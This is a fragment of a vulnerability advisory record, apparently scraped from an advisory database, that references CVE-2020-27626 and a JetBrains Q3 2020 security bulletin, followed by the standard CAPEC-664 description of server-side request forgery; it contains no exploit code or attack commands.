"modified": "2022-05-24T17:34:18Z",
"published": "2022-05-24T17:34:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27626"
},
{
"type": "WEB",
"url": "https://blog.jetbrains.com"
},
{
"type": "WEB",
"url": "https://blog.jetbrains.com/2020/11/16/jetbrains-security-bulletin-q3-2020"
}
],
"schema_version": "1.4.0",
"severity": []
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.